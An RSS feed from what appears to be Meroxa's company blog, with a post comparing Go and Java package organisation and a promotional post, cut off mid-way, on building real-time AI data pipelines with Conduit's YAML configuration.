<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0"><channel><title><![CDATA[Meroxa - Blog & Insights]]></title><description><![CDATA[Meroxa is the industry-leading low-code real-time data streaming platform. Explore our platform for free!]]></description><link>https://meroxa.com</link><generator>GatsbyJS</generator><lastBuildDate>Thu, 21 Aug 2025 21:14:05 GMT</lastBuildDate><item><title><![CDATA[From Java to Go, Part 2: Packages]]></title><description><![CDATA[Explore how Go organizes code with packages and directories—and why it’s often cleaner than Java’s approach. A practical comparison from a Java developer learning Go.]]></description><link>https://meroxa.com/blog/from-java-to-go-part-2-packages</link><guid isPermaLink="false">https://meroxa.com/blog/from-java-to-go-part-2-packages</guid><dc:creator><![CDATA[Haris Osmanagić]]></dc:creator><pubDate>Wed, 25 Jun 2025 17:53:00 GMT</pubDate><content:encoded>&lt;p&gt;This blog post is part of a series where I write about my experiences while learning Go. I&apos;ll also be sharing my thoughts about some of the differences between Java and Go. In the &lt;a href=&quot;https://meroxa.com/blog/from-java-to-go-a-developers-journey-pt-1/&quot;&gt;previous blog post&lt;/a&gt;, you can find some resources and real-life projects through which I learned Go. You can also learn about some of the differences in interfaces, functions, and error handling. This blog post will focus on organizing code through packages and directories. At the end, I explain why I believe Java&apos;s approach to packages should evolve to be more like Go&apos;s.&lt;/p&gt;
&lt;h2&gt;Packages, directories, and files&lt;/h2&gt;
&lt;p&gt;Unlike Java, Go doesn&apos;t require the directory (physical) structure to match the package (logical) structure. There is one similarity, though: &lt;em&gt;a single directory can hold only a single package&lt;/em&gt;. Let&apos;s take a look at this example:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;bash&quot;&gt;&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;pkg/foo
├── a.go
└── b.go&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;code class=&quot;language-text&quot;&gt;a.go&lt;/code&gt; and &lt;code class=&quot;language-text&quot;&gt;b.go&lt;/code&gt; &lt;em&gt;can&lt;/em&gt; belong to the package &lt;code class=&quot;language-text&quot;&gt;bar&lt;/code&gt;, but usually, the package name matches the directory name (i.e., &lt;code class=&quot;language-text&quot;&gt;foo&lt;/code&gt;).&lt;/p&gt;
&lt;p&gt;There are no limitations on the types that &lt;code class=&quot;language-text&quot;&gt;a.go&lt;/code&gt; or &lt;code class=&quot;language-text&quot;&gt;b.go&lt;/code&gt; can contain (whereas in Java, a public class &lt;code class=&quot;language-text&quot;&gt;Foo&lt;/code&gt; has to be declared in &lt;code class=&quot;language-text&quot;&gt;Foo.java&lt;/code&gt;).&lt;/p&gt;
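&lt;p&gt;To make this concrete, here&apos;s a sketch (the file contents and type names are invented for illustration): two files in the same directory declare the same package, and each file may contain any mix of types and functions.&lt;/p&gt;

```go
// pkg/foo/a.go
package foo

// Any file in the package may declare any types it likes;
// the file name carries no meaning for the compiler.
type Config struct {
	Name string
}

// pkg/foo/b.go
package foo

// Code in b.go can use Config directly, without an import,
// because both files belong to package foo.
func Describe(c Config) string {
	return "config: " + c.Name
}
```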
&lt;h2&gt;Imports&lt;/h2&gt;
&lt;p&gt;A Go package&apos;s import path is its &lt;a href=&quot;https://go.dev/ref/mod#module-path&quot;&gt;module path&lt;/a&gt; joined with its sub-directory within the module, for example:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;go&quot;&gt;&lt;pre class=&quot;language-go&quot;&gt;&lt;code class=&quot;language-go&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;import&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;
	&lt;span class=&quot;token string&quot;&gt;&quot;fmt&quot;&lt;/span&gt;
	&lt;span class=&quot;token string&quot;&gt;&quot;github.com/example/myservice&quot;&lt;/span&gt;
	acme_service &lt;span class=&quot;token string&quot;&gt;&quot;github.com/acmeinc/myservice&quot;&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

&lt;span class=&quot;token keyword&quot;&gt;func&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;main&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	c &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; myservice&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;NewClient&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;http://localhost:8080&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
	fmt&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Println&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;c&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;GetInfo&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
	
	acme_service&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Run&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Imports can be given aliases, which is useful when two imported packages share the same name (as the two &lt;code class=&quot;language-text&quot;&gt;myservice&lt;/code&gt; packages do above).&lt;/p&gt;
&lt;p&gt;A notable limitation is that circular dependencies between packages are not allowed (i.e., if &lt;code class=&quot;language-text&quot;&gt;foo&lt;/code&gt; imports &lt;code class=&quot;language-text&quot;&gt;bar&lt;/code&gt;, &lt;strong&gt;directly or indirectly&lt;/strong&gt;, then &lt;code class=&quot;language-text&quot;&gt;bar&lt;/code&gt; is not allowed to import &lt;code class=&quot;language-text&quot;&gt;foo&lt;/code&gt;, directly or indirectly).&lt;/p&gt;
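&lt;p&gt;As an illustration (the module path and package names here are made up), a cycle like this is rejected at compile time:&lt;/p&gt;

```go
// foo/foo.go
package foo

import "example.com/project/bar" // foo depends on bar...

func Greet() string { return "hello, " + bar.Name() }

// bar/bar.go
package bar

// ...so bar may not depend on foo, directly or indirectly.
import "example.com/project/foo" // compile error: import cycle not allowed

func Name() string { return foo.DefaultName }
```

&lt;p&gt;The usual fix is to move the shared pieces into a third package that both &lt;code class=&quot;language-text&quot;&gt;foo&lt;/code&gt; and &lt;code class=&quot;language-text&quot;&gt;bar&lt;/code&gt; can import.&lt;/p&gt;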
&lt;h2&gt;Can packages be organized into hierarchies?&lt;/h2&gt;
&lt;p&gt;If you always refer to a type as &lt;code class=&quot;language-text&quot;&gt;packageName.typeName&lt;/code&gt;, does this mean you can have only a single, flat level of packages? And how do you cope with complex projects?&lt;/p&gt;
&lt;p&gt;Go packages don&apos;t have a hierarchy (whereas Java packages do). This may become a problem in complex projects (although when that happens, we should first ask whether the project is too complex and needs to be split up). You can still organize the code in as many directories as your file system allows. Here&apos;s an example from the &lt;a href=&quot;https://github.com/ConduitIO/conduit&quot;&gt;Conduit&lt;/a&gt; project:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;bash&quot;&gt;&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;pkg/
├── conduit
├── connector
├── foundation
│   ├── cerrors
│   ├── ctxutil
│   ├── grpcutil
│   ├── log
│   └── metrics
│       ├── measure
│       ├── noop
│       └── prometheus
├── http
│   ├── api
│   │   ├── fromproto
│   │   ├── status
│   │   └── toproto
│   └── openapi
│       └── swagger-ui
│           └── api
│               └── v1
├── inspector
├── lifecycle
│   └── stream
├── lifecycle-poc
│   └── funnel
├── orchestrator&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h2&gt;Packages and type names&lt;/h2&gt;
&lt;p&gt;Let&apos;s assume that we&apos;re working on a driver for a database called &lt;code class=&quot;language-text&quot;&gt;FantasticDB&lt;/code&gt;. We&apos;ll need the following types: &lt;code class=&quot;language-text&quot;&gt;Database&lt;/code&gt;, &lt;code class=&quot;language-text&quot;&gt;Client&lt;/code&gt;, &lt;code class=&quot;language-text&quot;&gt;Table&lt;/code&gt;, etc.&lt;/p&gt;
&lt;p&gt;In Java, you&apos;ll end up with something like:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code class=&quot;language-text&quot;&gt;io.fantasticdb.client.Client&lt;/code&gt; , or&lt;/li&gt;
&lt;li&gt;&lt;code class=&quot;language-text&quot;&gt;io.fantasticdb.client.FantasticDBClient&lt;/code&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Both are pretty common and, at least in my experience, the latter is more common than the former.&lt;/p&gt;
&lt;p&gt;In Go, we would have &lt;code class=&quot;language-text&quot;&gt;fantasticdb.Client&lt;/code&gt;, and that&apos;s it. There&apos;s no package hierarchy, and repeating the package name in a type name (so-called stuttering) is something Go code avoids, which leaves us with just &lt;code class=&quot;language-text&quot;&gt;fantasticdb.Client&lt;/code&gt;.&lt;/p&gt;
&lt;h2&gt;If I were to change one or the other…&lt;/h2&gt;
&lt;p&gt;…I&apos;d make Java packages work as they do in Go. :) And here&apos;s why.&lt;/p&gt;
&lt;p&gt;Let&apos;s say we&apos;re working on a type that manages user data, which is stored in a fictional &lt;strong&gt;FantasticDB&lt;/strong&gt; database and cached using &lt;strong&gt;LightningCache&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;The Java code could look like this:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;java&quot;&gt;&lt;pre class=&quot;language-java&quot;&gt;&lt;code class=&quot;language-java&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;public&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;class&lt;/span&gt; &lt;span class=&quot;token class-name&quot;&gt;UserService&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    &lt;span class=&quot;token comment&quot;&gt;// option 1&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;private&lt;/span&gt; &lt;span class=&quot;token class-name&quot;&gt;FantasticDBClient&lt;/span&gt; db&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;private&lt;/span&gt; &lt;span class=&quot;token class-name&quot;&gt;LightningCacheClient&lt;/span&gt; cache&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
    
    &lt;span class=&quot;token comment&quot;&gt;// option 2&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;private&lt;/span&gt; &lt;span class=&quot;token class-name&quot;&gt;&lt;span class=&quot;token namespace&quot;&gt;io&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;fantasticdb&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;/span&gt;Client&lt;/span&gt; db&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;private&lt;/span&gt; &lt;span class=&quot;token class-name&quot;&gt;&lt;span class=&quot;token namespace&quot;&gt;io&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;lightningcache&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;/span&gt;Client&lt;/span&gt; cache&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

&lt;span class=&quot;token comment&quot;&gt;// option 1&lt;/span&gt;
&lt;span class=&quot;token keyword&quot;&gt;void&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;setCache&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token class-name&quot;&gt;LightningCacheClient&lt;/span&gt; cache&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;this&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;cache &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; cache&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

&lt;span class=&quot;token comment&quot;&gt;// option 2&lt;/span&gt;
&lt;span class=&quot;token keyword&quot;&gt;void&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;setCache&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token class-name&quot;&gt;&lt;span class=&quot;token namespace&quot;&gt;io&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;lightningcache&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;/span&gt;Client&lt;/span&gt; cache&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;this&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;cache &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; cache&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Option 1 reads nicely in the &lt;code class=&quot;language-text&quot;&gt;users&lt;/code&gt; package as it&apos;s more concise. However, it&apos;s not the preferred choice for the authors of FantasticDB and LightningCache: within a &lt;code class=&quot;language-text&quot;&gt;fantasticdb&lt;/code&gt; library and an &lt;code class=&quot;language-text&quot;&gt;io.fantasticdb&lt;/code&gt; package, a &lt;code class=&quot;language-text&quot;&gt;FantasticDBClient&lt;/code&gt; is too verbose. Option 2 has the opposite trade-off: it&apos;s unambiguous, but verbose at every point of use. (In practice, we see option 1 a lot.) In many real-world examples, we&apos;ll see even longer package names with more nesting.&lt;/p&gt;
&lt;p&gt;Once you start thinking about it, the problem is in the package name: it&apos;s nested and long.&lt;/p&gt;
&lt;p&gt;The Go code would look like this:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;go&quot;&gt;&lt;pre class=&quot;language-go&quot;&gt;&lt;code class=&quot;language-go&quot;&gt;&lt;span class=&quot;token comment&quot;&gt;// fantasticdb/client.go&lt;/span&gt;
&lt;span class=&quot;token keyword&quot;&gt;package&lt;/span&gt; fantasticdb

&lt;span class=&quot;token keyword&quot;&gt;type&lt;/span&gt; Client &lt;span class=&quot;token keyword&quot;&gt;struct&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

&lt;span class=&quot;token comment&quot;&gt;// lightningcache/client.go&lt;/span&gt;
&lt;span class=&quot;token keyword&quot;&gt;package&lt;/span&gt; lightningcache

&lt;span class=&quot;token keyword&quot;&gt;type&lt;/span&gt; Client &lt;span class=&quot;token keyword&quot;&gt;struct&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

&lt;span class=&quot;token comment&quot;&gt;// users.go&lt;/span&gt;
&lt;span class=&quot;token keyword&quot;&gt;package&lt;/span&gt; users

&lt;span class=&quot;token keyword&quot;&gt;type&lt;/span&gt; Users &lt;span class=&quot;token keyword&quot;&gt;struct&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    db     fantasticdb&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Client
    cache  lightningcache&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Client
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Why does this code (for the “external” packages and our code alike) look cleaner? It&apos;s because of the package name: its declaration (in the &lt;code class=&quot;language-text&quot;&gt;fantasticdb&lt;/code&gt; and &lt;code class=&quot;language-text&quot;&gt;lightningcache&lt;/code&gt; packages) and its usage (in the &lt;code class=&quot;language-text&quot;&gt;users&lt;/code&gt; package). Also, the dot in the variable declaration makes it more readable (&lt;code class=&quot;language-text&quot;&gt;fantasticdb.Client&lt;/code&gt; vs. &lt;code class=&quot;language-text&quot;&gt;FantasticDBClient&lt;/code&gt;).&lt;/p&gt;
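&lt;p&gt;Wiring the two clients together could look like the following sketch (the constructor is my own addition, not part of the example above):&lt;/p&gt;

```go
// users.go (continued)
package users

// New wires both dependencies; each is referred to by the short,
// readable packageName.TypeName form, with no stuttering.
func New(db fantasticdb.Client, cache lightningcache.Client) Users {
	return Users{db: db, cache: cache}
}
```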
&lt;h2&gt;A win-win strategy?&lt;/h2&gt;
&lt;p&gt;We have two personas working with code:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;the &lt;strong&gt;author&lt;/strong&gt; of the code&lt;/li&gt;
&lt;li&gt;and the &lt;strong&gt;user&lt;/strong&gt; of the code (a developer writing new code and using existing packages)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Their interests sometimes clash, as we&apos;ve seen above.&lt;/p&gt;
&lt;p&gt;A &lt;strong&gt;code author&lt;/strong&gt; typically prefers simple class names. But those names, like &lt;code class=&quot;language-text&quot;&gt;Database&lt;/code&gt;, &lt;code class=&quot;language-text&quot;&gt;Client&lt;/code&gt;, or &lt;code class=&quot;language-text&quot;&gt;Table&lt;/code&gt;, are often already used by other packages or libraries. In our &lt;code class=&quot;language-text&quot;&gt;FantasticDB&lt;/code&gt; example, these types are perfectly clear within the &lt;code class=&quot;language-text&quot;&gt;fantasticdb&lt;/code&gt; package. There&apos;s no need to name them &lt;code class=&quot;language-text&quot;&gt;FantasticDBDatabase&lt;/code&gt; or &lt;code class=&quot;language-text&quot;&gt;FantasticDBTable&lt;/code&gt;. Doing so would only bloat the codebase unnecessarily.&lt;/p&gt;
&lt;p&gt;A &lt;strong&gt;code user&lt;/strong&gt;, on the other hand, wants names to be specific and meaningful at the point of use. This often leads to “squeezing” extra context into type names, especially when package names are long or nested.&lt;/p&gt;
&lt;p&gt;In this context, Go&apos;s approach to packages strikes a nice balance: it&apos;s a win-win for both the code author and the code user.&lt;/p&gt;
&lt;h2&gt;Final thoughts&lt;/h2&gt;
&lt;p&gt;When I started programming in Go, I didn&apos;t expect that I&apos;d be spending this much time on packages. Nor did I expect that I&apos;d start with a brief comparison of packages and end up with a whole blog post just about packages.:) It reminded me how even some basic language features can trigger a lot of thinking.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Build AI That Keeps Up: Real-Time Pipelines with Conduit]]></title><description><![CDATA[Modern AI applications demand real-time data to be truly effective. Whether you're building intelligent customer support systems, dynamic recommendation engines, or adaptive fraud detection models, the value of AI diminishes rapidly as data ages. In many cases, the difference between real-time and batch processing isn't just about speed—it's about relevance, accuracy, and competitive advantage.]]></description><link>https://meroxa.com/blog/build-ai-that-keeps-up-real-time-pipelines-with-conduit</link><guid isPermaLink="false">https://meroxa.com/blog/build-ai-that-keeps-up-real-time-pipelines-with-conduit</guid><dc:creator><![CDATA[James Martinez]]></dc:creator><pubDate>Thu, 12 Jun 2025 10:30:00 GMT</pubDate><content:encoded>&lt;p&gt;&lt;em&gt;The age of batch processing AI models with stale data is over. Here&apos;s why real-time data streaming is essential for AI applications that actually matter—and how to build them without the complexity.&lt;/em&gt;&lt;/p&gt;
&lt;h2&gt;The Real-Time AI Revolution&lt;/h2&gt;
&lt;p&gt;Imagine your customer support team receiving a flood of urgent tickets, but your AI summarization system only processes them once every hour. Or picture your RAG (Retrieval Augmented Generation) knowledge base being updated with critical company policies, but your AI chatbot won&apos;t know about them until tomorrow&apos;s batch job runs.&lt;/p&gt;
&lt;p&gt;This isn&apos;t just inefficient—it&apos;s actively harmful to business outcomes.&lt;/p&gt;
&lt;p&gt;Modern AI applications demand &lt;strong&gt;real-time data&lt;/strong&gt; to be truly effective. Whether you&apos;re building intelligent customer support systems, dynamic recommendation engines, or adaptive fraud detection models, the value of AI diminishes rapidly as data ages. In many cases, the difference between real-time and batch processing isn&apos;t just about speed—it&apos;s about relevance, accuracy, and competitive advantage.&lt;/p&gt;
&lt;h2&gt;The Hidden Cost of Stale Data in AI Systems&lt;/h2&gt;
&lt;p&gt;Traditional data processing approaches were designed for a different era. When AI models were primarily used for offline analytics and periodic reporting, batch processing made sense. But today&apos;s AI applications are &lt;strong&gt;operational tools&lt;/strong&gt; that need to respond to the world as it changes.&lt;/p&gt;
&lt;p&gt;Consider these real-world scenarios where stale data kills AI effectiveness:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Customer Support Automation&lt;/strong&gt;: An AI system that summarizes support tickets from this morning&apos;s batch can&apos;t help with the urgent issues flooding in right now. By the time the system processes today&apos;s tickets, it’s tomorrow.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Dynamic Pricing Models&lt;/strong&gt;: E-commerce AI that adjusts prices based on yesterday&apos;s inventory and competitor data is making decisions with outdated information. In fast-moving markets, this can mean lost revenue or overpriced inventory that won&apos;t sell.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Fraud Detection&lt;/strong&gt;: Financial AI models that operate on hourly batches of transaction data are fighting yesterday&apos;s fraud patterns. Modern fraudsters move fast—your AI needs to move faster.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Content Personalization&lt;/strong&gt;: Recommendation systems that update user preferences once per day miss the real-time signals that indicate changing interests, seasonal demands, or trending topics.&lt;/p&gt;
&lt;p&gt;The pattern is clear: &lt;strong&gt;AI systems that operate on stale data are reactive instead of proactive&lt;/strong&gt;. They&apos;re always one step behind the problems they&apos;re supposed to solve.&lt;/p&gt;
&lt;h2&gt;Why Traditional Automation Falls Short&lt;/h2&gt;
&lt;p&gt;Most organizations start their AI automation journey with familiar tools and patterns. They set up database triggers, cron jobs, and scheduled ETL processes. While these approaches work for many use cases, they create fundamental limitations for AI workflows:&lt;/p&gt;
&lt;h3&gt;Database Triggers: The Complexity Trap&lt;/h3&gt;
&lt;p&gt;Database triggers seem like an obvious solution, but they quickly become a maintenance nightmare:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Tight Coupling&lt;/strong&gt;: AI logic becomes embedded in database code, making it difficult to test and deploy independently&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Limited Scalability&lt;/strong&gt;: Database resources are shared between your application and AI processing&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Error Handling Complexity&lt;/strong&gt;: Failed AI processing requires complex retry logic built into your database layer&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Multi-Database Challenges&lt;/strong&gt;: Modern applications spanning multiple databases require complex coordination&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Scheduled Jobs: The Latency Problem&lt;/h3&gt;
&lt;p&gt;Cron jobs are reliable but fundamentally batch-oriented:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Fixed Intervals&lt;/strong&gt;: Data waits unnecessarily while jobs create artificial processing delays&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Resource Waste&lt;/strong&gt;: Jobs run during low-activity periods and may not run frequently enough during peaks&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Recovery Complexity&lt;/strong&gt;: Determining what data was missed during failures becomes an operational burden&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Traditional approaches also struggle with &lt;strong&gt;integration complexity&lt;/strong&gt;. Modern AI workflows require connecting multiple data sources, calling external AI services, and coordinating results across various systems—all while handling different APIs, authentication mechanisms, and error conditions.&lt;/p&gt;
&lt;h2&gt;Enter Change Data Capture and Stream Processing&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;Change Data Capture (CDC)&lt;/strong&gt; represents a fundamentally different approach. Instead of polling databases or relying on triggers, CDC captures data changes at the transaction log level and streams them in real-time.&lt;/p&gt;
&lt;p&gt;CDC offers key advantages:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;True Real-Time Processing&lt;/strong&gt;: Sub-second latency for data changes&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Minimal Database Impact&lt;/strong&gt;: Operates by reading transaction logs, not adding load&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Complete Change History&lt;/strong&gt;: Captures full data evolution over time&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Guaranteed Delivery&lt;/strong&gt;: Strong consistency guarantees prevent data loss&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;But CDC alone isn&apos;t enough: you also need a &lt;strong&gt;streaming platform&lt;/strong&gt; that can connect multiple sources, apply AI transformations, handle errors gracefully, and provide operational visibility.&lt;/p&gt;
&lt;h2&gt;Why Conduit Changes the Game for AI Workflows&lt;/h2&gt;
&lt;p&gt;&lt;a href=&quot;https://conduit.io/&quot;&gt;Conduit&lt;/a&gt; was built specifically to address these challenges. It provides a unified platform for building real-time data pipelines that integrate seamlessly with AI services and modern data infrastructure.&lt;/p&gt;
&lt;h3&gt;Real-Time by Design&lt;/h3&gt;
&lt;p&gt;Conduit uses CDC and other real-time mechanisms to capture data changes instantly:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;yaml&quot;&gt;&lt;pre class=&quot;language-yaml&quot;&gt;&lt;code class=&quot;language-yaml&quot;&gt;&lt;span class=&quot;token key atrule&quot;&gt;connectors&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; postgres&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;source
    &lt;span class=&quot;token key atrule&quot;&gt;plugin&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;postgres&quot;&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;source&quot;&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;tables&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;customer_interactions&quot;&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;url&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; $&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;DATABASE_URL&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This simple configuration creates a real-time stream of changes from your PostgreSQL database. No triggers, no polling, no scheduled jobs—just immediate capture of data as it changes.&lt;/p&gt;
&lt;h3&gt;AI Integration Made Simple&lt;/h3&gt;
&lt;p&gt;Integrating AI services into traditional data pipelines often requires custom code, error handling, and infrastructure management. Conduit makes AI integration declarative:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;yaml&quot;&gt;&lt;pre class=&quot;language-yaml&quot;&gt;&lt;code class=&quot;language-yaml&quot;&gt;&lt;span class=&quot;token key atrule&quot;&gt;processors&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; sentiment&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;analysis
    &lt;span class=&quot;token key atrule&quot;&gt;plugin&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;openai.textgen&quot;&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;api_key&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; $&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;OPENAI_API_KEY&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
